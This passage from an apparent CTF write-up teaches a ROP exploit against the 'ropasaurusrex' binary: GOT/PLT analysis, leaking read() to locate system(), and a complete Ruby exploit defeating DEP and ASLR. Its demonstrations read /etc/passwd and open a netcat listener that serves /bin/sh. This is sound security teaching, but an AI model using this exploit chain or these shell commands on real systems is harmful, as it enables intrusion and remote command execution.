    08049600 R_386_GLOB_DAT    __gmon_start__
    08049610 R_386_JUMP_SLOT   __gmon_start__
    08049614 R_386_JUMP_SLOT   write
    08049618 R_386_JUMP_SLOT   __libc_start_main
    0804961c R_386_JUMP_SLOT   read

So we know the address, inside the binary, of the table entries for read() and write(). What’s that mean? Let’s take a look at the value in read()’s entry while the binary is running:

    $ gdb ./ropasaurusrex
    (gdb) run
    ^C
    Program received signal SIGINT, Interrupt.
    0xb7fe2424 in __kernel_vsyscall ()
    (gdb) x/x 0x0804961c
    0x804961c:      0xb7f48110
    (gdb) print read
    $1 = {<text variable, no debug info>} 0xb7f48110 <read>

Well, look at that... a pointer to read() at a memory address that we know! What can we do with that, I wonder? I’ll give you a hint: we can use the write() function (which we can also call at a known address) to grab data from arbitrary memory and write it to the socket.
Finally, running some code!
Okay, let’s break this down into steps. We need to:
- Copy a command into memory using the read() function.
- Get the address of the read() function using the write() function.
- Calculate the offset between read() and system(), which lets us get the address of system().
- Call system().
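The arithmetic in the middle two steps is small enough to sketch right away. This Ruby snippet uses read() as the leaked function (that’s the one the exploit ends up leaking) and the two addresses from my gdb sessions; the “leaked” value is hypothetical, derived so that it lines up with the first ASLR run shown earlier, and system_from_leak is a made-up helper name.

```ruby
READ_LOCAL   = 0xb7f48110   # read() as gdb showed it with ASLR off
SYSTEM_LOCAL = 0xb7ec2450   # system() from the same setup
READ_SYSTEM_DIFF = READ_LOCAL - SYSTEM_LOCAL
puts format("diff: 0x%x", READ_SYSTEM_DIFF)

# The target hands us 4 raw little-endian bytes; turn them into system().
def system_from_leak(leaked_bytes, diff)
  leaked_bytes.unpack1("V") - diff
end

# Hypothetical leak: where read() would be if system() were at 0xb766e450.
leak = [0xb76f4110].pack("V")
system_addr = system_from_leak(leak, READ_SYSTEM_DIFF)
puts format("system: 0x%08x", system_addr)

# These are the 4 bytes we would send back for the second read() to store.
reply = [system_addr].pack("V")
```

The difference only holds for one particular libc build, so against a real target it has to be computed from their libc, not yours.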
To call system(), we’re gonna have to write the address of system() somewhere in memory, then call it. The easiest way to do that is to overwrite the pointer that read()’s .plt entry jumps through (the relocation slot at 0x0804961c), then call read().
By now, you’re probably confused. Don’t worry, I was too. I was shocked I got this working. :)
Let’s just go for broke now and get this working! Here’s the stack frame we want:
    +----------------------+
    |         ...          |
    +----------------------+

    +----------------------+ <-- system()'s frame [7]
    |      void *arg       |
    +----------------------+
    |   [return address]   |
    +----------------------+

    +----------------------+ <-- pop/pop/pop/ret's frame [6]
    |  [address of read]   | - this will actually jump to system()
    +----------------------+

    +----------------------+ <-- second read()'s frame [5]
    |     size_t count     | - 4 bytes (the size of a 32-bit address)
    +----------------------+
    |      void *buf       | - pointer to read() so we can overwrite it
    +----------------------+
    |        int fd        | - 0 (stdin)
    +----------------------+
    | [address of "pppr"]  |
    +----------------------+

    +----------------------+ <-- pop/pop/pop/ret's frame [4]
    |  [address of read]   |
    +----------------------+

    +----------------------+ <-- write()'s frame [3]
    |     size_t count     | - 4 bytes (the size of a 32-bit address)
    +----------------------+
    |      void *buf       | - The address containing a pointer to read()
    +----------------------+
    |        int fd        | - 1 (stdout)
    +----------------------+
    | [address of "pppr"]  |
    +----------------------+

    +----------------------+ <-- pop/pop/pop/ret's frame [2]
    |  [address of write]  |
    +----------------------+

    +----------------------+ <-- read()'s frame [1]
    |     size_t count     | - strlen(cmd)
    +----------------------+
    |      void *buf       | - writeable memory
    +----------------------+
    |        int fd        | - 0 (stdin)
    +----------------------+
    | [address of "pppr"]  |
    +----------------------+

    +----------------------+
    |         ...          |
    +----------------------+
Holy smokes, what’s going on!?
Let’s start at the bottom and work our way up! I tagged each frame with a number for easy reference.
Frame [1] we’ve seen before. It writes cmd into our writable memory. Frame [2] is a standard pop/pop/pop/ret to clean up the read().
Frame [3] uses write() to write the address of the read() function to the socket. Frame [4] uses a standard pop/pop/pop/ret to clean up after write().
Frame [5] reads another address over the socket and writes it to memory. This address is going to be the address of system(). Writing it to memory works because of how read() is called. Take a look at the read() call we’ve been using (0x0804832C) in gdb and you’ll see this:

    (gdb) x/i 0x0804832C
    0x804832c <read@plt>:   jmp    DWORD PTR ds:0x804961c
read() is actually implemented as an indirect jump! So if we can change what ds:0x804961c’s value is, and still jump to it, then we can jump anywhere we want! So in frame [3] we read the address from memory (to get the actual address of read()) and in frame [5] we write a new address there.
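Frame [6] is a standard pop/pop/pop/ret construct, with a small difference: the return address of the pop/pop/pop/ret is 0x804832c, which is actually read()’s .plt entry. Since frame [5] overwrote the pointer that entry jumps through with the address of system(), this call actually goes to system()! Frame [7] then supplies system()’s argument: a pointer to the cmd we stored in writable memory.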
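The only arithmetic in all of this is turning the leaked address of read() into the address of system(). The sketch below replays that step offline, assuming the two addresses from my own libc and a made-up, randomly chosen ASLR slide (real ASLR picks the base differently, and a different libc build has a different offset). No socket is involved; the leaked bytes are simulated with pack.

```ruby
# Addresses as seen on the machine used in this post
read_addr_local   = 0xb7f48110
system_addr_local = 0xb7ec2450

# The distance between the two functions is fixed for a given libc build
read_system_diff = read_addr_local - system_addr_local

# Assumption for illustration: ASLR moved libc by some page-aligned amount
slide = 0x1000 * rand(0..255)

# Simulate the 4 bytes that write() sends back over the socket.
# "V" is a 32-bit little-endian unsigned integer.
leaked_bytes = [read_addr_local + slide].pack("V")

# What the exploit does with those bytes
this_read_addr   = leaked_bytes.unpack("V").first
this_system_addr = this_read_addr - read_system_diff

puts "offset:   0x%x" % read_system_diff
puts "read():   0x%08x" % this_read_addr
puts "system(): 0x%08x" % this_system_addr
```

Whatever the slide is, system() stays the same distance below read(), which is why leaking a single address is enough.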
Final code
Whew! That’s quite complicated. Here’s code that implements the full exploit for ropasaurusrex, bypassing both DEP and ASLR:
require 'socket'

s = TCPSocket.new("localhost", 4444)

# The command we'll run
cmd = ARGV[0] + "\0"

# From objdump -x
buf = 0x08049530

# From objdump -D ./ropasaurusrex | grep read
read_addr = 0x0804832C
# From objdump -D ./ropasaurusrex | grep write
write_addr = 0x0804830C
# From gdb, "x/x system"
system_addr = 0xb7ec2450
# From objdump, "pop/pop/pop/ret"
pppr_addr = 0x080484b6

# The location that read()'s .plt entry jumps through
# (it holds the real address of read())
read_addr_ptr = 0x0804961c

# The difference between read() and system()
# Calculated as read (0xb7f48110) - system (0xb7ec2450)
# Note: This is the one number that needs to be calculated using the
# target version of libc rather than my own!
read_system_diff = 0x85cc0

# Generate the payload
payload = "A"*140 +
  [
    # system()'s stack frame
    buf,           # writable memory (cmd buf)
    0x44444444,    # system()'s return address

    # pop/pop/pop/ret's stack frame
    # Note that this calls read_addr, whose pointer is overwritten with
    # the address of system() by the previous stack frame
    read_addr,     # (this will become system())

    # second read()'s stack frame
    # This reads the address of system() from the socket and overwrites
    # the pointer read()'s .plt entry jumps through, so calls to read()
    # end up going to system()
    4,             # length of an address
    read_addr_ptr, # where the pointer to read() is stored
    0,             # stdin
    pppr_addr,     # read()'s return address

    # pop/pop/pop/ret's stack frame
    read_addr,

    # write()'s stack frame
    # This frame gets the address of the read() function from the
    # pointer read()'s .plt entry uses and writes it to stdout
    4,             # length of an address
    read_addr_ptr, # where the pointer to read() is stored
    1,             # stdout
    pppr_addr,     # return address

    # pop/pop/pop/ret's stack frame
    write_addr,

    # read()'s stack frame
    # This reads the command we want to run from the socket and puts it
    # in our writable "buf"
    cmd.length,    # number of bytes
    buf,           # writable memory (cmd buf)
    0,             # stdin
    pppr_addr,     # read()'s return address

    read_addr      # Overwrite the original return
  ].reverse.pack("I*") # Convert a series of 'ints' to a string

# Write the 'exploit' payload
s.write(payload)

# When our payload calls read() the first time, this is read
s.write(cmd)

# Get the result of the write() call, which is the actual address of read
this_read_addr = s.read(4).unpack("I").first

# Calculate the address of system()
this_system_addr = this_read_addr - read_system_diff

# Write the address back, where it'll be read() into the correct place by
# the second read() call
s.write([this_system_addr].pack("I"))

# Finally, read the result of the actual command
puts(s.read())

# Clean up
s.close()
And here it is in action:
$ ruby sploit.rb "cat /etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
You can, of course, change cat /etc/passwd to anything you want (including a netcat listener!):
ron@debian-x86 ~ $ ruby sploit.rb "pwd"
/home/ron
ron@debian-x86 ~ $ ruby sploit.rb "whoami"
ron
ron@debian-x86 ~ $ ruby sploit.rb "nc -vv -l -p 5555 -e /bin/sh" &
[1] 3015
ron@debian-x86 ~ $ nc -vv localhost 5555
debian-x86.skullseclabs.org [127.0.0.1] 5555 (?) open
pwd
/home/ron
whoami
ron
Conclusion
And that’s it! We just wrote a reliable, DEP/ASLR-bypassing exploit for ropasaurusrex.
Feel free to comment or contact me if you have any questions!